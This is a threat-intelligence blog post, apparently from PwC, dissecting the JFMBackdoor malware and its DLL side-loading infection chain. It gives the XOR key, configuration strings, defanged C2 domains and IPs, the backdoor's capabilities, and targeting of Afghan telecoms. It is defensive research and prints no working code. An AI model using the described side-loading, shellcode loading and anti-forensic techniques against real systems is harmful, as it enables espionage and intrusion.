Inside Red Lamassu’s JFMBackdoor

Executive summary

PwC Threat Intelligence has been tracking a China-based threat actor we call Red Lamassu (a.k.a. Calypso) since 2019, observing its operations targeting telecommunications and government entities across the Asia Pacific region with a combination of bespoke and shared tooling. This blog is released in tandem with Lumen’s Black Lotus Labs, who detail one portion of Red Lamassu’s operations (an ELF binary we respectively call kworker or Showboat), whilst we focus on the Windows-oriented elements of its operations.

Our analysis revolves around an open directory found during our hunting of Red Lamassu, containing both an aforementioned kworker sample, alongside a fully featured Windows backdoor, which we call JFMBackdoor. Delivered via DLL side-loading, JFMBackdoor supports a range of capabilities, including: remote shell access, file system operations, network proxying, screenshot capture, and self-removal capabilities.

Technical writeup – the initial phases

As part of our ongoing tracking of Red Lamassu, we observed an open directory hosted on the IP address: 23.27.201[.]160, active between July and October 2025. Most of the binaries in the directory are part of a connected infection chain, with the exception being the files entitled clear and systemd-ac-update.

Neither clear nor systemd-ac-update are the focus of this blog, with the former being Linux-oriented log file tampering malware, and the latter being a sample of the kworker malware (which Lumen names Showboat in its blog).

Table 1 - Files observed hosted on 23.27.201[.]160

Figure 1 — Infection chain overview

We assessed the 23.27.201[.]160 directory to almost certainly be tied to Red Lamassu operations, based on a TLS certificate served by IP addresses we exclusively associate with Red Lamassu:

In Figure 2, 1.bat remotely downloads the other files into a victim’s %TEMP% directory, and subsequently executes the file entitled fltMC.exe, a legitimate executable that in turn loads FLTLIB.dll. 

It is worth noting that this script will not execute as-is in its current form. However, each individual command within it remains functional when run separately or concatenated onto a single line. One possibility is that 1.bat is designed to be passed through an obfuscator that transforms the script allowing it to be run as a standalone script.

Figure 2 - Contents of 1.bat

FLTLIB.dll finds and opens scr.mui and XOR decrypts the contents with the key Zs0@31=KDw.*7ev. The format of this file is a series of entries that are four bytes of an XOR encrypted length, followed by encrypted data. The decrypted data is configuration data read by both FLTLIB.dll and the final payload, and includes the following strings:

• flt.bin
• FLTLIB.dll
• fltMC.exe
• C:\Program Files (x86)\Windows Mail\wabmig.exe
• C:\ProgramData\Microsoft\Network
• SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
• namefuture[.]site

FLTLIB.dll then loads the file entitled flt.bin in memory and executes it. flt.bin is a shellcode stub that then decodes and loads the final embedded payload PE file into memory, the details of which we provide below:

The decoded shellcode is a fully functional backdoor we have named JFMBackdoor (on account of a hardcoded filepath within the malware: C:\Users\public\jfm), and leverages command and sub-commands via CppServer library classes: TCPSession, WSSession and WSSSession, communicating with its C2: namefuture[.]site.

The command and sub-command code functionality is extensive. Whilst the full command list is provided in Appendix B, we can summarise the JFMBackdoor’s functionality below:

• Remote Shell Access: Provides two reverse shell variants, a standard one and a version that launches suspended and detaches from the console to evade inspection by other processes.
• File System Operations: Full file management including reading, writing, copying, moving, deleting files/folders, directory listing, file search by pattern, file execution, timestomping, and modifying file attributes.
• Network Proxying: Ability to establish TCP proxy sessions.
• Process & Service Management: Can enumerate, create, and terminate processes, as well as enumerate, start, stop, and delete Windows services.
• Network Reconnaissance: Gathers active TCP/UDP connection tables and can manipulate TCP entries.
• Registry Manipulation: Full Create, Read, Update, and Delete (CRUD) operations, including the ability to enumerate, create, modify, rename, and delete registry keys and values.
• Screenshot Capture: Takes screenshots using GDI+ functions, then Base64-encodes and XOR-encrypts them before saving to disk for exfiltration.
• Self-Management: Can create/reload encrypted configuration files, and services, and uninstall itself for anti-forensic purposes.
• Configuration Management: Stores and reloads encrypted configuration from files (scr.mui, btasc.cfg), allowing the operator to dynamically update the malware's behavior.

Additional files 

The aforementioned key used in FLTLIB.dll to decode scr.mui – Zs0@31=KDw.*7ev – is also observed across three other samples:

Table 2 - Additional observed files that contain the Zs0@31=KDw.*7ev decryption key

The file entitled scr.mui contained the following configuration data, in particular revealing three new domains:

• sl.bin
• sllauncherloc.dll
• C:\Windows\SysWOW64\msdt.exe
• C:\ProgramData\Microsoft\Network
• SOFTWARE\Microsoft\Windows NT\CurrentVersion\Window
• en[.]cumm[.]info
• xcent[.]online
• cumm[.]info

Additional infrastructure – tying it all together

From the analysis above, we found the following C2 domains either used or embedded in the malware:

• en[.]cumm[.]info;
• xcent[.]online;
• cumm[.]info; and,
• namefuture[.]site

Whilst these were hosted behind Cloudflare, a Cloudflare certificate for namefuture[.]site was served by following IP address: 166.88.11[.]196, as well as an additional DNS resolution to 139.180.223[.]193. 

The IPs 166.88.11[.]196 and 139.180.223[.]193 are also seen serving an additional CloudFlare certificate associated with the domain newsprojects[.]online – the C2 used in one of the kworker samples we have observed.

This newsprojects[.]online certificate was also observed on the following IP addresses:

Table 3 - Observed hosts that served newsprojects[.]online certificate

Figure 3 - Overview of connections between IoCs found during this analysis attributed to Red Lamassu

We also observed a DNS resolution from newsprojects[.]online to 64.227.128[.]21 and 23.27.201[.]115, with the latter also resolving xcent[.]online. 

Targeting

During analysis of the open directory contents, we identified multiple artefacts tying this intrusion to a telecommunications provider in Afghanistan:

• FLTBIN.dll was uploaded to an online multi-antivirus scanner from a user in Afghanistan; and,
• The O=My Organization certificate referenced at the beginning of this blog was also hosted on the IP: 195.86.120[.]2. This IP has hosted both a legitimate certificate belonging to an Afghan government entity, as well as a separate certificate that appears to be associated with a domain controller belonging to an Afghan telecommunications provider.

The targeting of Afghanistan and its telecommunications sector aligns with what we assess to almost certainly be Red Lamassu’s wider operational goals and objectives. In our private reporting, we have observed the threat actor targeting the telecommunications sectors of Kazakhstan, Thailand, and India, using much of the tooling outlined in this blog.^{1, 2, 3, 4, 5}